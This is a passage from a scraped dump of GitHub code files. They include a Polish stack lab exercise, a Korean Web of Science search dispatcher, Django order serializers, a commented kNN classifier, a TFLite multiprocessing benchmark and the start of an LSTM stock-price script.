elementowych krotek - operacji na stosie.\n Pierwszy element krotki to operacja, drugi wartość (opcjonalnie). 
Operacje:\n    push - dodaj element do stosu\n    pop - usuń element ze stosu\n    show_max - wypisz maksymalny element w stosie\n    Uzupełnij funkcje tak, by dla podanej zwróciła ciąg maksymalnych elementów (zgodny z liczbą operacji 3).\n\n    :param stack_commands: List of tuples of stack commands.\n    :type stack_commands: list\n    :return: List of outputs from commands.\n    :rtype: list\n    \"\"\"\n\n\n\nif __name__ == \"__main__\":\n    commands = [\n        ('push', 97),\n        ('pop',),\n        ('push', 20), \n        ('pop',), \n        ('push', 26), \n        ('push', 20), \n        ('pop',), \n        ('show_max',), \n        ('push', 91), \n        ('show_max',)\n    ]\n    assert stack_operation(commands) == [26, 91]\n","repo_name":"przempol/python_labs","sub_path":"lab_2/tasks/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9249999477","text":"with open(\"/home/zxh/train_list.txt\", \"r+\") as f:\n    lines = f.readlines()\nlabel_image = {}\nfor line in lines:\n    name, label = line.split(\" \")\n    label = label[:-1]\n    name = name.split('/')[1].split('.')[0]\n    # print(name,\" \",label)\n    if label in label_image.keys():\n        label_image[label].append(name)\n    else:\n        label_image[label] = [name]\n\n# print(label_image.keys())\nprint(len(label_image.keys()))\n\nnumbers = dict()\n\nfor k, v in label_image.items():\n    # print(f\"{k} {len(v)}\")\n    if len(v) in numbers.keys():\n        numbers[len(v)].append(k)\n    else:\n        numbers[len(v)] = [k]\n\nsorted_keys = sorted(numbers)\n\nless_4 = []\nless_20_more_4 = []\nfor key in sorted_keys:\n    if key <= 20 and key >= 4:\n        less_20_more_4 += numbers[key]\n    elif key < 4:\n        less_4 += numbers[key]\nprint(len(set(less_20_more_4)))\nprint(len(set(less_4)))\nwith open(\"less_4.txt\", 'w') as f:\n    f.write(str(less_4))\nwith open(\"less_20_more_4.txt\", 'w') as f:\n    f.write(str(less_20_more_4))\n\n","repo_name":"ZHUXUHAN/reid-baseline","sub_path":"pre_data/prepare_list.py","file_name":"prepare_list.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28790008775","text":"import citationSearch\nimport commonSearch\nimport sju_response\nimport concurrent.futures\nimport datetime\nimport sys\nimport os\nimport traceback\n\ndef inputValidation(dsres, serviceName):\n    dsres.print(command='log', msg='인풋 값을 검증합니다.')\n    now = datetime.datetime.now()\n    returnDict = {}\n    \n    # 단일 상세 검색 및 저자명 검색\n    if serviceName == 'singleCitationSearch' or serviceName == 'citationSearchByAuthor':\n        query = input().strip()\n        startYear = input().strip()\n        endYear = input().strip()\n        pAuthors = input().strip()\n        organization = input().strip()\n        \n        if not len(query) > 2: raise Exception('쿼리의 길이가 너무 짧습니다.')\n        if not 1900 <= int(startYear) <= now.year: raise Exception('시작년도가 올바르지 않습니다.')\n        if not 1900 <= int(endYear) <= now.year: raise 
Exception('끝 년도가 올바르지 않습니다.')\n if not int(startYear) <= int(endYear): raise Exception('검색 기간이 올바르지 않습니다.')\n if not (gubun == 'TI' or gubun == 'DO'): raise Exception('구분이 올바르지 않습니다.')\n if not (\n path.endswith('.csv') \n or path.endswith('.xls')\n or path.endswith('.xlsx')): raise Exception('파일 확장자가 올바르지 않습니다.')\n returnDict['startYear'] = startYear \n returnDict['endYear'] = endYear \n returnDict['gubun'] = gubun \n returnDict['path'] = path \n\n # 다중 일반 검색\n elif serviceName == 'multiCommonSearch':\n startYear = input().strip()\n endYear = input().strip()\n gubun = input().strip()\n inputFilePath = input().strip()\n defaultQueryPackSize = input().strip()\n\n if not 1900 <= int(startYear) <= now.year: raise Exception('시작년도가 올바르지 않습니다.')\n if not 1900 <= int(endYear) <= now.year: raise Exception('끝 년도가 올바르지 않습니다.')\n if not int(startYear) <= int(endYear): raise Exception('검색 기간이 올바르지 않습니다.')\n if not (gubun == 'TI' or gubun == 'DO'): raise Exception('구분이 올바르지 않습니다.')\n path = inputFilePath\n if not (\n path.endswith('.csv') \n or path.endswith('.xls')\n or path.endswith('.xlsx')): raise Exception('파일 확장자가 올바르지 않습니다.')\n returnDict['startYear'] = startYear \n returnDict['endYear'] = endYear \n returnDict['gubun'] = gubun \n returnDict['inputFilePath'] = path \n returnDict['defaultQueryPackSize'] = defaultQueryPackSize \n else:\n raise Exception('인풋 값 검증 중 알 수 없는 오류')\n return returnDict\n\nif __name__ == \"__main__\":\n sLock = citationSearch.SearchLock()\n dsres = sju_response.SJUresponse('dispatcher')\n dsres.print(command='res', target='loading', res=True)\n dsres.print(command='log', msg='dispatcher를 준비합니다.')\n singleCitationSearchObj = None\n multiCitationSearchObj = None\n multiCommonSearchObj = None\n oneByOneSearchObj = None\n\n # 서비스 초기화\n try:\n serviceList = [\n { 'name': 'SingleCitationSearch', 'init': citationSearch.SingleSearch }, \n { 'name': 'MultiCitationSearch', 'init': citationSearch.MultiSearch },\n { 'name': 'oneByOneSearch', 'init': citationSearch.OneByOneSearch },\n { 'name': 'MultiCommonSearch', 'init': commonSearch.MultiSearch },\n ]\n \n dsres.print(command='log', msg='기반 서비스를 초기화합니다. 
이 작업은 2~3분이 소요됩니다.')\n dsres.print(command='log', msg='각 서비스의 브라우저 인증, 검색 폼 초기화를 수행합니다.')\n dsres.print(command='log', msg='초기화 진행 중 검색 서비스는 이용할 수 없습니다.')\n with concurrent.futures.ThreadPoolExecutor(max_workers=len(serviceList)) as executor:\n future_service = {\n executor.submit(service['init'], sju_response.SJUresponse(service['name']), sLock): service['name'] for service in serviceList\n }\n for future in concurrent.futures.as_completed(future_service):\n name_done = future_service[future]\n try:\n tempObj = future.result()\n if name_done == 'SingleCitationSearch': \n singleCitationSearchObj = tempObj\n dsres.print(command='log', msg='SID : %s'%(singleCitationSearchObj.SID))\n dsres.print(command='log', msg='jsessionid : %s'%(singleCitationSearchObj.jsessionid))\n dsres.print(command='log', msg='단일 상세 검색 서비스 초기화가 완료되었습니다.')\n elif name_done == 'MultiCitationSearch':\n multiCitationSearchObj = tempObj\n dsres.print(command='log', msg='다중 상세 검색 서비스 초기화가 완료되었습니다.')\n elif name_done == 'MultiCommonSearch':\n multiCommonSearchObj = tempObj\n dsres.print(command='log', msg='다중 일반 검색 서비스 초기화가 완료되었습니다.')\n elif name_done == 'oneByOneSearch':\n oneByOneSearchObj = tempObj\n dsres.print(command='log', msg='저자명 기준 검색 서비스 초기화가 완료되었습니다.')\n \n except Exception as e:\n dsres.print(command='sysErr', msg='초기화 중 오류가 발생했습니다.')\n dsres.print(command='errObj', msg=e)\n else:\n dsres.print(command='log', msg='%s 초기화 완료'%name_done)\n \n except Exception as e:\n dsres.print(command='sysErr', msg='연결에 실패했습니다. 인터넷 연결이나 접속한 장소가 유효한 지 확인해주세요. 혹은 일시적 현상일 수 있으니 잠시 후 다시 접속해주세요.')\n dsres.print(command='log', msg='dispatcher를 종료합니다.')\n dsres.print(command='errObj', msg=e)\n exit(2000)\n\n dsres.print(command='log', msg='dispatcher가 준비되었습니다.')\n while(True):\n # 반복 전역 예외 처리\n dsres.print(command='res', target='loading', res=False)\n try:\n \n # 검색 서비스 종류\n serviceName = input().strip()\n dsres.print(command='res', target='loading', res=True)\n \n inputs = ''\n try:\n inputs = inputValidation(dsres, serviceName)\n except Exception as e:\n dsres.print(command='sysErr', msg='인풋 값이 유효하지 않습니다.')\n dsres.print(command='errObj', msg=e)\n continue\n\n # 단일 상세 검색\n if serviceName == 'singleCitationSearch':\n query = inputs['query']\n startYear = inputs['startYear']\n endYear = inputs['endYear']\n pAuthors = inputs['pAuthors']\n organization = inputs['organization']\n\n try:\n singleCitationSearchObj.generalSearch(\n query=(query, pAuthors, organization), \n startYear=startYear, \n endYear=endYear, \n gubun='TI',\n resName='res',\n )\n \n except Exception as e:\n dsres.print(command='sysErr', msg='심각한 오류')\n dsres.print(command='errObj', msg=e)\n else:\n dsres.print(command='log', msg='단일 검색을 마쳤습니다.')\n\n # 다중 상세 검색\n elif serviceName == 'multiCitationSearch':\n startYear = inputs['startYear']\n endYear = inputs['endYear']\n gubun = inputs['gubun']\n path = inputs['path']\n\n try:\n multiCitationSearchObj.generalSearch(\n startYear=startYear,\n endYear=endYear,\n gubun=gubun,\n path=path\n )\n except Exception as e:\n dsres.print(command='sysErr', msg='상세 엑셀 검색 중 오류가 발생했습니다.')\n else:\n dsres.print(command='log', msg='상세 엑셀 검색이 완료되었습니다.')\n\n # 다중 일반 검색\n elif serviceName == 'multiCommonSearch':\n startYear = inputs['startYear']\n endYear = inputs['endYear']\n gubun = inputs['gubun']\n inputFilePath = inputs['inputFilePath']\n defaultQueryPackSize = inputs['defaultQueryPackSize']\n\n try:\n multiCommonSearchObj.generalSearch(\n startYear = startYear,\n endYear = endYear,\n gubun = gubun,\n inputFilePath = inputFilePath,\n 
defaultQueryPackSize = 0\n )\n except Exception as e:\n dsres.print(command='sysErr', msg='일반 엑셀 검색 중 오류가 발생했습니다.')\n else:\n dsres.print(command='log', msg='일반 엑셀 검색이 완료되었습니다.')\n\n # 저자명 기준 검색\n if serviceName == 'citationSearchByAuthor':\n query = inputs['query']\n startYear = inputs['startYear']\n endYear = inputs['endYear']\n pAuthors = inputs['pAuthors']\n organization = inputs['organization']\n try:\n oneByOneSearchObj.generalSearch(\n query=(query, pAuthors, organization),\n startYear=startYear,\n endYear=endYear, \n gubun='AU',\n resName='ares',\n )\n \n except Exception as e:\n dsres.print(command='sysErr', msg='심각한 오류')\n dsres.print(command='errObj', msg=e)\n else:\n dsres.print(command='log', msg='저자명 검색을 마쳤습니다.')\n # 알 수 없는 서비스 네임\n else:\n print(serviceName)\n # dsres.print(command='sysErr', msg='알 수 없는 서비스 접근')\n except EOFError as eof:\n dsres.print(command='sysErr', msg='dispatcher와의 연결이 해제되었습니다. 프로그램을 다시 시작해주세요.')\n sys.exit(1)\n except Exception as e:\n dsres.print(command='sysErr', msg='알 수 없는 오류가 발생했습니다.')\n traceback.print_tb(e.__traceback__) \n continue","repo_name":"jcpark3797/sejong-wos","sub_path":"pyscripts/OLDPY/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":12010,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9407915923","text":"from rest_flex_fields import FlexFieldsModelSerializer\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import MethodNotAllowed, NotFound\nfrom store.models import Product\nfrom store.serializers import (\n ProductPreviewSerializer,\n VendorPreviewSerializer,\n)\n\nfrom .models import Order, OrderDetail\n\navailable = (\"OFFERED\", \"DENIED\", \"PENDING\")\nsold = (\"PROCESSING\", \"ACCEPTED\", \"COMPLETED\")\n\n\nclass OrderPreviewSerializer(serializers.ModelSerializer):\n vendor = VendorPreviewSerializer(read_only=True)\n buyer = VendorPreviewSerializer(read_only=True)\n product = ProductPreviewSerializer(read_only=True)\n\n class Meta:\n model = Order\n fields = [\n \"id\",\n \"product\",\n \"vendor\",\n \"buyer\",\n \"status\",\n \"amount\",\n \"created_at\",\n \"updated_at\",\n ]\n\n\nclass OrderDetailSerializer(FlexFieldsModelSerializer):\n # order = OrderPreviewSerializer(read_only=True)\n\n class Meta:\n model = OrderDetail\n fields = [\n \"id\",\n \"full_name\",\n \"email\",\n \"phone_number\",\n \"country\",\n \"zipcode\",\n \"town_or_city\",\n \"street_address1\",\n \"street_address2\",\n \"county\",\n \"created_at\",\n \"updated_at\",\n \"stripe_pid\",\n \"order\",\n ]\n\n\nclass OrderDetailReadSerializer(FlexFieldsModelSerializer):\n class Meta:\n model = OrderDetail\n fields = \"__all__\"\n\n\nclass OrderFullSerializer(serializers.ModelSerializer):\n vendor = VendorPreviewSerializer(read_only=True)\n buyer = VendorPreviewSerializer(read_only=True)\n product = ProductPreviewSerializer(read_only=True)\n order_detail = OrderDetailSerializer(many=True, read_only=True)\n\n class Meta:\n model = Order\n fields = [\n \"id\",\n \"product\",\n \"vendor\",\n \"buyer\",\n \"status\",\n \"amount\",\n \"created_at\",\n \"updated_at\",\n \"order_detail\",\n ]\n\n\nclass OrderSerializer(FlexFieldsModelSerializer):\n class Meta:\n model = Order\n fields = [\n \"id\",\n \"product\",\n \"vendor\",\n \"buyer\",\n \"status\",\n \"amount\",\n \"created_at\",\n \"updated_at\",\n \"order_detail\",\n ]\n expandable_fields = {\n \"vendor\": VendorPreviewSerializer,\n \"buyer\": VendorPreviewSerializer,\n \"product\": 
ProductPreviewSerializer,\n \"order_detail\": OrderDetailReadSerializer,\n }\n extra_kwargs = {\n \"amount\": {\"required\": False},\n \"order_detail\": {\"required\": False},\n }\n\n def validate(self, data):\n \"\"\"\n The validate function checks if the buyer has already made an offer for this product.\n It also ensures that the first offer is never more than the price of the product.\n\n Args:\n self: Access the current instance of the class\n data: Pass in the validated data\n\n Returns:\n The data if it is valid\n \"\"\"\n\n # If it's a post request\n instance = getattr(self, \"instance\", None)\n print(\"instance\", instance)\n if self.context[\"request\"]._request.method == \"POST\":\n\n # Reject offer if buyer has already have a standing offer for the product\n if Order.objects.filter(\n buyer=data[\"buyer\"], product=data[\"product\"]\n ).exists():\n raise MethodNotAllowed(\n {\"message\": \"This product is already in your orders.\"}\n )\n\n # Ensure the first offer is never more than the price of the product\n if float(data[\"amount\"]) > float(data[\"product\"].price):\n raise MethodNotAllowed(\n {\n \"message\": f\"Your offer must not be greater than {data['product'].price}\"\n }\n )\n\n if self.context[\"request\"]._request.method == \"PUT\":\n # Ensure updates to offer amounts are validated only on put requests\n if self.context[\"request\"].user.vendor == instance.buyer:\n if float(data[\"amount\"]) > float(data[\"product\"].price):\n raise MethodNotAllowed(\n {\n \"message\": f\"Your offer must not be greater than {data['product'].price}\"\n }\n )\n\n # Reject offer if product is no longer available\n if not data[\"product\"].is_available:\n raise NotFound({\"message\": \"This product is no longer available.\"})\n\n return data\n\n def create(self, validated_data):\n \"\"\"\n The create function creates a new order instance.\n It takes in the validated_data and uses it to create an Order object.\n The amount is taken from the product price, unless otherwise specified by the user.\n If there is no change in status, then it will be marked as PROCESSING.\n\n Args:\n self: Reference the current instance of the model\n validated_data: Pass in the data that has already been validated by the serializer\n\n Returns:\n The newly created object\n \"\"\"\n request = self.context[\"request\"]\n buyer = request.user.vendor\n\n product = Product.objects.get(id=request.data.get(\"product\"))\n amount = validated_data.get(\"amount\", product.price)\n instance = Order.objects.create(buyer=buyer, product=product, amount=amount)\n\n if float(instance.amount) < float(product.price):\n instance.status = \"OFFERED\"\n if float(instance.amount) == float(product.price):\n instance.status = \"PROCESSING\"\n\n if instance.status == \"PROCESSING\":\n # Mark product as no longer available\n Product.objects.filter(id=instance.product.id).update(is_available=False)\n\n if instance.status == \"OFFERED\":\n # Mark product as still available\n Product.objects.filter(id=instance.product.id).update(is_available=True)\n\n instance.save()\n\n return instance\n\n def update(self, instance, validated_data):\n \"\"\"\n The update function is used to update the status of an order.\n It takes in a request and validated data as arguments.\n The user who made the request is determined by checking if it was a vendor or buyer making the request.\n If it was a vendor, then they can only update their own orders' statuses, otherwise if it was a buyer,\n they can only update their own orders' amounts.\n\n Args:\n self: 
Access fields and methods of the serializer class\n instance: Get the current object that is being updated\n validated_data: Pass in the data that has been validated by the serializer\n\n Returns:\n The updated instance\n \"\"\"\n\n user = self.context[\"request\"].user.vendor\n\n product_data = validated_data[\"product\"]\n product = Product.objects.get(id=product_data.id)\n\n if user == instance.vendor:\n # seller can update status\n print(\"request is from vendor\")\n instance.status = validated_data.get(\"status\", instance.status)\n print(\"result\", instance.status)\n\n if user == instance.buyer:\n # buyer can update amount\n instance.amount = validated_data.get(\"amount\", instance.amount)\n\n if float(instance.amount) < float(product.price):\n instance.status = \"OFFERED\"\n\n if float(instance.amount) == float(product.price):\n instance.status = \"PROCESSING\"\n\n instance.save()\n\n if instance.status in sold:\n # Mark product as no longer available\n product.is_available = False\n product.save()\n instance.product.is_available = False\n\n if instance.status in available:\n # Mark product as available\n product.is_available = True\n product.save()\n instance.product.is_available = True\n\n instance.product.save()\n return instance\n","repo_name":"israelias/thrift-api","sub_path":"order/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41533208534","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nfrom numpy import *\nimport operator\n\ndef createDataSet():\n \"\"\"\"\"\"\n group = array([[1.0, 1.1], [1.0, 1.0], [0, 0], [0, 0.1]])\n labels = ['A', 'A', 'B', 'B']\n return group, labels\n\n\ndef classify0(intX, dataSet, labels, k):\n \"\"\"k-NN algorithm\"\"\"\n # number of rows of the training set.\n dataSetSize = dataSet.shape[0]\n # tile() func creates a matrix whose values are inX and\n # whose size is identical to dataSet.\n # b = time(a, (m,n)),将a复制n次存入c中,再将c复制m次存入b中,如此构造出b。\n # Then do the minus calculation.\n diffMat = tile(intX, (dataSetSize,1)) - dataSet\n # Do the power\n sqDiffMat = diffMat ** 2\n # Do the sum, on the row direction.\n sqDistances = sqDiffMat.sum(axis=1)\n # Do the square root.\n distances = sqDistances ** 0.5\n # Sort and return the index value of the sorted elements.\n # For example, distances = [1.487, 1.414, 0, 0.1]\n # sortedDistIndicies := [2, 3, 1, 0] whose elements' values\n # are indexes of the distances elements.\n # 0 0.1 1.414 1.487\n # d2 d3 d1 d0\n sortedDistIndicies = distances.argsort()\n # A dict\n classCount = {}\n # 对k个点的每一个。\n for i in range(k):\n # 取该点label\n # i=0, sd[0]= 2(见sortedDistIndicies注释)\n # labels[2] = 'B'\n # voteIlabel := 'B'\n voteIlabel = labels[sortedDistIndicies[i]]\n # 计数,出现一次该label就增1\n # 计算k个点中,各标签出现次数。\n # 出现次数最多的标签,就是测试点的分类标签。\n # classCount.get('B', 0), dict.get() 功能如下: classCount中有key'B',\n # 就取其相应value。如果没有,取默认值,本例为0。 这样完成对标签计数。\n # dict.get('name', defaultValue)与dict['name']异同处:\n # \"It allows you to provide a default vlaue if the key is missing.\n # dict.get('name') is same as writing,\n # dict['name'] or None\n # so it implicitly handles keyError exception.\"\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n\n # 将classCount按第二列(key参数指定),即value列排序,\n # 大值在前(reverse参数指定)。\n # 最终sortedClassCount形如 [('B', 2), ('A', 1)], 是一个list。\n # In python 3, dict.iteritems() is replaced with dict.items.\n # So classCount.items() is correct.\n 
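# Aside (added sketch; k_nearest_labels is a hypothetical name for the k collected votes): collections.Counter(k_nearest_labels).most_common(1)[0][0]\n    # would return the same majority label in one call; the explicit dict + sorted() below keeps the vote counting visible.\n    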
sortedClassCount = sorted(classCount.items(),\n key=operator.itemgetter(1), reverse=True)\n # sortedClassCount[0], ('B', 2)\n # sortedClasscount[1], ('A', 1)\n # 而返回值sortedClassCount[0][0], 为'B',为该测试记录通过knn计算出的标签\n return sortedClassCount[0][0]\n\n\ndef file2matrix(filename):\n \"\"\"\"\"\"\n with open(filename) as fr:\n arrayOLines = fr.readlines()\n # 记录总条数\n numberOfLines = len(arrayOLines)\n # initialize the return matrix as a zeros matrix.\n returnMat = zeros((numberOfLines, 3))\n # initialize the label vector as empty list.\n classLabelVector = []\n index = 0\n\n # 取每一条记录\n for line in arrayOLines:\n # 去除行前后空格\n line = line.strip()\n # 以tab为分隔符,切分列。\n listFromLine = line.split('\\t')\n # 0 through 2nd column of the training example are features\n returnMat[index,:] = listFromLine[0:3]\n # 3rd (or -1) column of the training example is\n # the classification label\n classLabelVector.append(int(listFromLine[-1]))\n index += 1\n\n return returnMat, classLabelVector\n\ndef autoNorm(dataSet):\n \"\"\"归一化数据,保证特征权值等同。避免值大的features,比值小的features更有\n 影响力。\n newValue = (oldValue - min) / (max - min)\"\"\"\n\n # 0 表明按列取最小、最大值。\n minVals = dataSet.min(0)\n maxVals = dataSet.max(0)\n # 分母\n ranges = maxVals - minVals\n normDataSet = zeros(shape(dataSet))\n m = dataSet.shape[0]\n # 分子,取为矩阵,计算按element-wise方式进行。\n normDataSet = dataSet - tile(minVals, (m, 1))\n # 求归一值\n normDataSet = normDataSet / tile(ranges, (m, 1))\n\n return normDataSet, ranges, minVals\n\ndef datingClassTest():\n \"\"\"测试knn算法\"\"\"\n # Hold ration保留率10%, 数据中90%条记录取为训练集,余10%留为测试集。\n hoRatio = 0.10\n # 自文件读入数据。并将数据列,分为features, label。\n # 最后一列是label,放入dl中, 前面若干列是features,放入ddm中。\n ddm, dl, = file2matrix('datingTestSet2.txt')\n # 将features做归一化处理。\n nm, r , minv = autoNorm(ddm)\n # 训练集矩阵的“行”数。本例1000\n m = nm.shape[0]\n # 测试集数目。本例100\n numTestVecs = int(m * hoRatio)\n # 置错误数初值为0.0\n errorCount = 0.0\n \n # 对每一条测试数据。本例中i取值从0:99\n for i in range(numTestVecs):\n # 比对每一条数据与所有(numTestVecs:m,本例100:1000)训练集记录的knn距离\n # nm是训练集features, dl是训练集label。 k取3。\n classifierResult = classify0(nm[i,:], nm[numTestVecs:m,:], \\\n dl[numTestVecs:m], 3)\n # 比较计算的分类标签与真实的分类标签。\n if (classifierResult != dl[i]):\n # 不一致,分类错误,错误计数增1。\n errorCount += 1.0\n # 并格式化输出\n print(\" TestExample #%d : the label is misclassified as : [%d], the real answer is: [%d]\" \\\n % (i, classifierResult, dl[i]))\n else:\n # 一致,分类正确,格式化输出\n print(\"Test Example #%d : the classifier came back with: %d, the real answer is: %d\" \\\n % (i, classifierResult, dl[i]))\n\n # 总错误计数 / 总测试集记录条数, 即为错误率。\n print(\"The total error rate is: %f\" % (errorCount/float(numTestVecs)))\n\ndef main():\n datingClassTest()\n \nif __name__ == \"__main__\":\n main()\n\n# ============================================================================\n# After reading this knn code, I came up with the idea that maybe something\n# can be done to improve or extend this example.\n# 1. The calculation of distances can be refactored. There are multiple\n# definition variants concerning distances between two points.\n# To be specific, any form of Minkowski distances will do the job.\n# 2. The error rate can be improved using F-score based on precision and\n# recall.\n# 3. 
autoNorm can be replaced with the standard score known as Z-score, since\n#    \"Z-score will be our primary method of normalization.\"\n","repo_name":"cfsmile/PoMLiA","sub_path":"kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73173570408","text":"import numpy as np\nimport os, time\nimport tflite_runtime.interpreter as tflite\nfrom multiprocessing import Pool\n\n\n# globals: the module is re-imported in every worker process, so each worker gets its own copy of these\ninterpreter = None\ninput_details = None\noutput_details = None\ndef init_interpreter(model_path):\n    global interpreter\n    global input_details\n    global output_details\n    interpreter = tflite.Interpreter(model_path=model_path)\n    input_details = interpreter.get_input_details()\n    output_details = interpreter.get_output_details()\n    interpreter.allocate_tensors()\n    print('done init')\n\ndef do_inference(img_idx, img):\n    print('Processing image %d'%img_idx)\n    print('interpreter: %r' % (hex(id(interpreter)),))\n    print('input_details: %r' % (hex(id(input_details)),))\n    print('output_details: %r' % (hex(id(output_details)),))\n\n    tstart = time.time()\n\n    img = np.stack([img]*3, axis=2) # replicate the grayscale layer three times for RGB\n    img = np.array([img]) # create batch dimension\n    interpreter.set_tensor(input_details[0]['index'], img)\n    interpreter.invoke()\n\n    logit = interpreter.get_tensor(output_details[0]['index'])\n    pred = np.argmax(logit, axis=1)[0]\n    logit = list(logit[0])\n    duration = time.time() - tstart  \n\n    return logit, pred, duration\n\ndef main_par():\n    optimized_graph_def_file = r'float_model.tflite'\n    # init model once to find out input dimensions\n    interpreter_main = tflite.Interpreter(model_path=optimized_graph_def_file)\n    interpreter_main.allocate_tensors()\n    input_details = interpreter_main.get_input_details()\n    output_details = interpreter_main.get_output_details()\n    height = input_details[0]['shape'][1]\n    width = input_details[0]['shape'][2]\n    floating_model = (input_details[0]['dtype'] == np.float32)\n    input_mean = 127.5\n    input_std = 127.5\n    # Leftover video-capture experiment (cv2 / imutils FPS are never imported\n    # in this file), kept disabled so the multiprocessing benchmark stays runnable:\n    # vid_path = '17-05-46.flv'\n    # videostream = FileVideoStream(vid_path).start()\n    # videostream = VideoStream(0).start()\n    # videostream = cv2.VideoCapture(vid_path)\n    # time.sleep(1)\n    # fps = FPS().start()\n    # start_time = time.time()\n    # frame_count = 0\n    # min_conf_threshold = 0.8\n    # light_thresh = 90\n\n    num_test_imgs=1000\n    # pregenerate random images with values in [0,1]\n    test_imgs = np.random.rand(num_test_imgs, height, width).astype(input_details[0]['dtype'])\n\n    scores = []\n    predictions = []\n    it_times = []\n\n    tstart = time.time()\n    with Pool(processes=4, initializer=init_interpreter, initargs=(optimized_graph_def_file,)) as pool: # start 4 worker processes\n\n        results = pool.starmap(do_inference, enumerate(test_imgs))\n        scores, predictions, it_times = list(zip(*results))\n    duration = time.time() - tstart\n\n    print('Parent process time for %d images: %.2fs'%(num_test_imgs, duration))\n    print('Inference time for %d images: %.2fs'%(num_test_imgs, sum(it_times)))\n    print('mean time per image: %.3fs +- %.3f' % (np.mean(it_times), np.std(it_times)) )\n\n\n\nif __name__ == '__main__':\n    # main_seq()\n    
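# Note (added): the Pool initializer runs init_interpreter once per worker, so each process builds its own TFLite interpreter; interpreter objects are not picklable and cannot be shared across processes.\n    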
main_par()","repo_name":"FalconMadhab/useful_scripts","sub_path":"tflite_pool.py","file_name":"tflite_pool.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30699443405","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 18 23:00:22 2020\n@author: revan\n\"\"\"\n\n#importing libraries\nimport numpy as np \nimport os, sys\nfrom pathlib import Path, PureWindowsPath\n\n#getting data\nfrom pandas_datareader import data as pdr\nfrom datetime import datetime\n\n#data processing\nimport pandas as pd \npd.set_option('display.max_columns', 25)\n\n#data visualization\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\nfrom matplotlib import style\n\n#for normalizing data\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler(feature_range=(0, 1))\n\n#avoid warnings\nimport warnings\nwarnings.filterwarnings('ignore')\n\n#importing RNN libraries\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM\nfrom keras.models import load_model\n\n#DateTime\nfrom datetime import datetime\n\n#Setting the seed\nimport random\nnp.random.seed(1234)\nimport tensorflow as tf\ntf.random.set_seed(1000)\n#tf.set_random_seed(1000)\n\n#Functions from other files\nfrom check_overfit import get_params\n\n\n#building the model for the price prediction\ndef build_model(train,params,scaled_data_train): \n \n x_train, y_train = [], []\n for i in range(params['offset'],len(train)):\n x_train.append(scaled_data_train[i-params['offset']:i,0])\n y_train.append(scaled_data_train[i,0])\n \n x_train, y_train = np.array(x_train), np.array(y_train)\n x_train = np.reshape(x_train, (x_train.shape[0],x_train.shape[1],1)) \n \n #create and fit the LSTM network\n if params['units_2'] != 0:\n \n model = Sequential()\n model.add(LSTM(units=params['units_1'], return_sequences=True, \n input_shape=(x_train.shape[1],1)))\n model.add(Dropout(rate=params['drop_rate_1']))\n model.add(LSTM(units=params['units_2']))\n model.add(Dropout(rate=params['drop_rate_2']))\n model.add(Dense(1)) \n \n else:\n \n model = Sequential()\n model.add(LSTM(units=params['units_1'], return_sequences=False, \n input_shape=(x_train.shape[1],1)))\n model.add(Dropout(rate=params['drop_rate_1']))\n model.add(Dense(1))\n \n model.compile(loss='mean_squared_error', optimizer='adam')\n history = model.fit(x_train, y_train, epochs=params['epochs'], \n batch_size=params['batch_size'], verbose=1)\n \n return model, history\n \n\ndef run(data_df, params): \n \n #Plot the data and check if there are any unexpected anamolies(sudden spikes or dips)\n plt.figure(figsize=(16,8))\n plt.plot(data_df['Close'], label='Close Price history')\n plt.title('Close Price History')\n \n new_data = pd.DataFrame(index=range(0,len(data_df)),columns=['Date', 'Close'])\n for i in range(0,len(data_df)):\n new_data['Date'][i] = data_df.index[i]\n new_data['Close'][i] = data_df['Close'][i]\n \n #setting index\n new_data.index = new_data.Date\n new_data.drop('Date', axis=1, inplace=True)\n \n tl = len(new_data)\n \n dataset = new_data.values\n train = dataset[0:tl,:]\n \n #Normalizing the data\n scaler = MinMaxScaler(feature_range=(0,1))\n scaler.fit(train)\n scaled_data_train = scaler.transform(train)\n \n model, history = build_model(train,params,scaled_data_train)\n \n #return predict(params,new_data,scaler,model)\n return model\n\n\n#'main' program\nif __name__ == '__main__':\n \n 
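# Editor's sketch (hypothetical usage, not part of the original script): once\n # run() below has saved model.h5, it could be reloaded for inference, e.g.\n # model = load_model('model.h5') # load_model is imported above\n # window = scaled_train[-offset:].reshape(1, -1, 1) # last 'offset' scaled closes (illustrative names)\n # next_scaled = model.predict(window)\n # next_close = scaler.inverse_transform(next_scaled) # undo the MinMax scaling\n 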
